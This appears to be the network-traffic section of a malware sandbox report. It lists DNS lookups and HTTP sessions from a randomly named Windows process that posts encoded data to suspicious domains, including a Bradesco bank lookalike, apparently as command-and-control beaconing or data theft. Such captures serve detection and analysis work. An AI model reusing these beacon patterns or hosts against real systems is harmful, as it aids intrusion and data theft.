Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 198.58.118.167 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 45.79.19.196 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 72.14.178.174 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 173.255.194.134 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 45.33.20.235 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 45.33.23.183 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 45.33.18.44 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:19.134821892 CEST | 1.1.1.1 | 192.168.2.4 | 0x41a6 | No error (0) | www.myim.cloud | - | 199.59.243.226 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:32.696712017 CEST | 1.1.1.1 | 192.168.2.4 | 0xcce2 | No error (0) | www.d55dg.top | d55dg.top | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 3, 2024 12:46:32.696712017 CEST | 1.1.1.1 | 192.168.2.4 | 0xcce2 | No error (0) | d55dg.top | - | 154.23.184.240 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:46.680761099 CEST | 1.1.1.1 | 192.168.2.4 | 0x426a | No error (0) | www.arlon-commerce.com | whois-unverified.domainbox.akadns.net | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 3, 2024 12:47:00.013551950 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e80 | No error (0) | www.fineg.online | - | 162.0.239.141 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:47:13.659240961 CEST | 1.1.1.1 | 192.168.2.4 | 0xe892 | No error (0) | www.asian-massage-us.xyz | - | 199.59.243.226 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:47:26.805310965 CEST | 1.1.1.1 | 192.168.2.4 | 0x930 | Server failure (2) | www.thriveline.online | none | none | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:47:34.928621054 CEST | 1.1.1.1 | 192.168.2.4 | 0xa0f5 | No error (0) | www.aflaksokna.com | aflaksokna.com | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 3, 2024 12:47:34.928621054 CEST | 1.1.1.1 | 192.168.2.4 | 0xa0f5 | No error (0) | aflaksokna.com | - | 5.144.130.52 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:47:57.401392937 CEST | 1.1.1.1 | 192.168.2.4 | 0x46e0 | Name error (3) | www.esistiliya.online | none | none | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:48:05.513112068 CEST | 1.1.1.1 | 192.168.2.4 | 0x59bc | No error (0) | www.qiluqiyuan.buzz | - | 161.97.168.245 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:48:19.006894112 CEST | 1.1.1.1 | 192.168.2.4 | 0x6806 | No error (0) | www.omexai.info | omexai.info | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 3, 2024 12:48:19.006894112 CEST | 1.1.1.1 | 192.168.2.4 | 0x6806 | No error (0) | omexai.info | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:48:19.006894112 CEST | 1.1.1.1 | 192.168.2.4 | 0x6806 | No error (0) | omexai.info | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:48:32.770678997 CEST | 1.1.1.1 | 192.168.2.4 | 0x73bc | No error (0) | www.dfbio.net | - | 218.247.68.184 | A (IP address) | IN (0x0001) | false
                      • www.clientebradesco.online
                      • www.myim.cloud
                      • www.d55dg.top
                      • www.fineg.online
                      • www.asian-massage-us.xyz
                      • www.aflaksokna.com
                      • www.qiluqiyuan.buzz
                      • www.omexai.info
                      • www.dfbio.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 45.33.2.79 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
Timestamp | Bytes transferred | Direction | Data
Sep 3, 2024 12:46:03.294533014 CEST | 462 | OUT | GET /xsf1/?3L7=cfJLLBshpRPDzp&TJY8=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
Host: www.clientebradesco.online
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
Sep 3, 2024 12:46:03.778975964 CEST | 1236 | IN | HTTP/1.1 200 OK
server: openresty/1.13.6.1
date: Tue, 03 Sep 2024 10:46:03 GMT
content-type: text/html
transfer-encoding: chunked
connection: close
                      Data Raw: 34 38 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 6c 69 65 6e 74 65 [TRUNCATED]
                      Data Ascii: 481<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.clientebradesco.online/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.clientebradesco.online/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725360363.0067147854&other_args=eyJ1cmkiOiAiL3hzZjEiLCAiYXJncyI6ICIzTDc9Y2ZKTExCc2hwUlBEenAmVEpZOD0vMmR4T0NyOWU4VHU0N1ZyRHRwU2VYMTBuUHRTZzNwRHRKRXQzYzJGb3o1ZnB6ZW9SSXVqQlZqckRNc0tIYzcwKzBLOWlWS0E3dkU5WkZDaU01T2FGVHNlYW1CNTBaMzlFMUdzWEswYno5U1U4NFB5V3JHdEVlZz0iLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlv [TRUNCATED]
Sep 3, 2024 12:46:03.779367924 CEST | 85 | IN | Data Raw: 64 32 56 69 63 43 77 71 4c 79 6f 37 63 54 30 77 4c 6a 67 69 66 51 3d 3d 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d
                      Data Ascii: d2VicCwqLyo7cT0wLjgifQ=="; } </script> </body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 199.59.243.226 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
Timestamp | Bytes transferred | Direction | Data
Sep 3, 2024 12:46:19.152934074 CEST | 708 | OUT | POST /12ts/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Content-Length: 201
Host: www.myim.cloud
Origin: http://www.myim.cloud
Referer: http://www.myim.cloud/12ts/
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 62 51 39 67 56 68 57 45 54 6a 2f 44 65 48 31 73 63 6e 64 34 69 4d 45 48 7a 73 4e 64 52 65 38 6a 46 7a 55 46 42 2f 77 55 5a 57 38 52 6a 6f 30 38 38 55 68 34 36 30 4b 67 73 32 39 38 68 39 67 6f 7a 43 73 65 69 32 4f 6b 42 5a 5a 71 69 71 6f 49 48 71 65 69 77 77 6e 31 6f 44 46 51 35 51 70 70 4c 4b 67 42 66 64 42 32 64 78 51 68 7a 44 56 6f 36 31 6b 56 42 68 76 32 71 56 52 65 67 4e 6a 6b 66 36 4e 58 4f 2f 6c 56 37 69 6b 6d 62 4f 55 4d 52 74 39 2f 51 51 2f 65 32 4f 75 31 73 71 4c 34 32 73 44 31 4d 4c 79 72 68 61 32 44 70 76 78 6f 4f 44 46 5a 32 51 3d 3d
                      Data Ascii: TJY8=SIczoioFeEyVbQ9gVhWETj/DeH1scnd4iMEHzsNdRe8jFzUFB/wUZW8Rjo088Uh460Kgs298h9gozCsei2OkBZZqiqoIHqeiwwn1oDFQ5QppLKgBfdB2dxQhzDVo61kVBhv2qVRegNjkf6NXO/lV7ikmbOUMRt9/QQ/e2Ou1sqL42sD1MLyrha2DpvxoODFZ2Q==
Sep 3, 2024 12:46:19.589030027 CEST | 1236 | IN | HTTP/1.1 200 OK
date: Tue, 03 Sep 2024 10:46:18 GMT
content-type: text/html; charset=utf-8
content-length: 1106
x-request-id: dc0cc2cc-126b-4511-8e7e-1ce8ae09bf74
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
set-cookie: parking_session=dc0cc2cc-126b-4511-8e7e-1ce8ae09bf74; expires=Tue, 03 Sep 2024 11:01:19 GMT; path=/
connection: close
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:46:19.589055061 CEST  559                IN         Data Raw: [hex omitted]
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGMwY2MyY2MtMTI2Yi00NTExLThlN2UtMWNlOGFlMDliZjc0IiwicGFnZV90aW1lIjoxNzI1MzYwMz


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      2           192.168.2.4  49738        199.59.243.226  80                1852  C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp                            Bytes transferred  Direction  Data
                      Sep 3, 2024 12:46:21.696630001 CEST  728                OUT        POST /12ts/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.myim.cloud
                      Origin: http://www.myim.cloud
                      Referer: http://www.myim.cloud/12ts/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8=SIczoioFeEyVJANgXCOEUD/ECX1sVHd8iMIHzt5NRtYjEWoFA6cUU28R740D20hz60Hfs058h+cozHoeinOjBJZkpKoKJKeiwwn1oDh25QxpI54BNsB1cxQi0DVowVkRBhvIqQJwgPbkf79XOOlSyikoRuVgUdl6VyafxtOmiJrdzqSvd6T8zaSw0o4cDA4QtUlff4XwYoDl72pTb1lMTEY=
                      Sep 3, 2024 12:46:22.131633997 CEST  1236               IN         HTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:46:22 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1106
                      x-request-id: 2c514f73-9f09-4b90-b979-bb65a751e16b
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                      set-cookie: parking_session=2c514f73-9f09-4b90-b979-bb65a751e16b; expires=Tue, 03 Sep 2024 11:01:22 GMT; path=/
                      connection: close
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:46:22.131647110 CEST  559                IN         Data Raw: [hex omitted]
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmM1MTRmNzMtOWYwOS00YjkwLWI5NzktYmI2NWE3NTFlMTZiIiwicGFnZV90aW1lIjoxNzI1MzYwMz


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      3           192.168.2.4  49739        199.59.243.226  80                1852  C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp                            Bytes transferred  Direction  Data
                      Sep 3, 2024 12:46:24.248466015 CEST  10810              OUT        POST /12ts/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.myim.cloud
                      Origin: http://www.myim.cloud
                      Referer: http://www.myim.cloud/12ts/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8=SIczoioFeEyVJANgXCOEUD/ECX1sVHd8iMIHzt5NRtQjFkwFBZEUV28Rlo0C20hU60uWs00Jh7YoylgeyFmjPJZkmqoJHqeNw07xoDx25QxpI/UBP9B1RRQhzDV061lEBhXYqQFOg+7kfbtXMcdS9ikqWuV4UdYqVyGpxsqIiObdzMv2B5LroMGsmKB8EDEJsEFXQrSrLJDP70gLCwx7JTKsM5dTX+OQo4gey4bEA/9TUHz8p92rvwuxIgWazu71NcZSpKk1P85acZwYt6ey+wZBZWv6J26W+SRdnxAKYexX/uklKAyibtqc2mTt/OlSlAkgCd1wRDk04okNSRrbxBazTIVY3Ef82I4RNqqY8P+mRFPlLl1NCOGDI/uN6z50pynmoQGirzjNhLPZAjO4tdJTmkr23CBahw9R5uM7uaihDviNA/X5EkMzq1/nrOw8bmwGPMjFv+sSV2W8tBetGxfE7EdtZidS3gOwiZqmjbsBRzTkMUQfDefRp7YKsDE9wszVvr2AlFZeG5O/0k0mbzoBwG9W5YNAajcAzy9gBogy3/dPo3FIhxnT0d2e4e9sRSPseu2Q5XIdsHoVR+3dV66KbCSaAbz+elGDcgVvv2emQtCHQctRr7mwa8VJb4JIWQlxa9z/assmCBojqXqGQBMycHWohHYQqrZHnRW7sO8Zrt1xCgfMeQcKzWahQlCTiNSNHA3L9lNDJgJm0qV2fN7Vg8mHnk/ujcQPJZrmCJ+tOf7AH0UZieeoKTbH6CQvAP/cQOs4jZA33MPza6BiJIGdCWDS4AqgRw9E385V1oQRzQTpYqjFrBstjRr8OLk8o5eWrn4Q5JESz8ugEU5gu1m9/7KTrx3ttlwwn9uchd6IP/eG1F8NsTiVhCBIYBNorp3dGNQtOH/XOZk8VScHn6WxbUXDcAjI0dQUVpRylq1DpV9uctDvoBkcbQaNeIU5Jkrcjms5iQNK4H+cJjf46p+rg2EWTyXGi60RF+Kg9qGAg4j [TRUNCATED]
                      Sep 3, 2024 12:46:24.686636925 CEST  1236               IN         HTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:46:24 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1106
                      x-request-id: d4a6851d-008f-447f-9d9d-4510e60fa3e7
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                      set-cookie: parking_session=d4a6851d-008f-447f-9d9d-4510e60fa3e7; expires=Tue, 03 Sep 2024 11:01:24 GMT; path=/
                      connection: close
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:46:24.686778069 CEST  559                IN         Data Raw: [hex omitted]
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDRhNjg1MWQtMDA4Zi00NDdmLTlkOWQtNDUxMGU2MGZhM2U3IiwicGFnZV90aW1lIjoxNzI1MzYwMz


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      4           192.168.2.4  49741        199.59.243.226  80                1852  C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp                            Bytes transferred  Direction  Data
                      Sep 3, 2024 12:46:26.794883966 CEST  450                OUT        GET /12ts/?TJY8=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&3L7=cfJLLBshpRPDzp HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.myim.cloud
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:46:27.237807989 CEST  1236               IN         HTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:46:26 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1454
                      x-request-id: 012fd1b3-3d4f-4b48-abf5-3dbaec4ffeaf
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uR26cbsThznJl597Dr/g6qoHjyRHPpyJCNKr/LpZ28+Ik3diLmLHlO5ERUrDZu/BuVc+NKfrt8Z96XQ9xNEHUQ==
                      set-cookie: parking_session=012fd1b3-3d4f-4b48-abf5-3dbaec4ffeaf; expires=Tue, 03 Sep 2024 11:01:27 GMT; path=/
                      connection: close
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uR26cbsThznJl597Dr/g6qoHjyRHPpyJCNKr/LpZ28+Ik3diLmLHlO5ERUrDZu/BuVc+NKfrt8Z96XQ9xNEHUQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:46:27.237822056 CEST  907                IN         Data Raw: [hex omitted]
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDEyZmQxYjMtM2Q0Zi00YjQ4LWFiZjUtM2RiYWVjNGZmZWFmIiwicGFnZV90aW1lIjoxNzI1MzYwMz


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      5           192.168.2.4  49742        154.23.184.240  80                1852  C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp                            Bytes transferred  Direction  Data
                      Sep 3, 2024 12:46:32.717315912 CEST  705                OUT        POST /ftud/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.d55dg.top
                      Origin: http://www.d55dg.top
                      Referer: http://www.d55dg.top/ftud/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8=PSOowArgf8yorRktZ0U0lqvib5FjrtDc9JEM8vTcgb94zvRZqnBJ7v8wgx/BlKc2TpvqV6R14G5UOqDy3prSYjTfTO3mZNQk8wcEXquK7s4RZR0DzAEURuAvERYfDZ0f0b44JoXrK0ms1mFui8jH1FWKHZEkTokrYdfbCgPa/nVlgVDuS+Wz2ijxqp+O1D3Leg==
                      Sep 3, 2024 12:46:33.583709955 CEST  302                IN         HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:46:33 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "668fe68e-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      6           192.168.2.4  49743        154.23.184.240  80                1852  C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp                            Bytes transferred  Direction  Data
                      Sep 3, 2024 12:46:35.258577108 CEST  725                OUT        POST /ftud/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.d55dg.top
                      Origin: http://www.d55dg.top
                      Referer: http://www.d55dg.top/ftud/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8=PSOowArgf8yopx4tUzo0gKvtUZFjxdDY9OMM8t+Rgut4yOhZrjtJ4v8wvR/EhKcpTpziV/p14CpUOrzyiOHVejTBK+3ka9Qk8wcEXu+g7sgRZBEDxkYXcOAuDRYfVp0b0b4KJpKOK2us1jhuzI3G/FWIJ5F7f4RAYsiFIAe84XZ/lTS0DP3kkiHC3u364AKCFsKAnIil6gcS2QtZsIf+oCg=
                      Sep 3, 2024 12:46:36.128294945 CEST  302                IN         HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:46:35 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "668fe68e-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      7           192.168.2.4  49744        154.23.184.240  80                1852  C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp                            Bytes transferred  Direction  Data
                      Sep 3, 2024 12:46:37.806225061 CEST  10807              OUT        POST /ftud/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.d55dg.top
                      Origin: http://www.d55dg.top
                      Referer: http://www.d55dg.top/ftud/
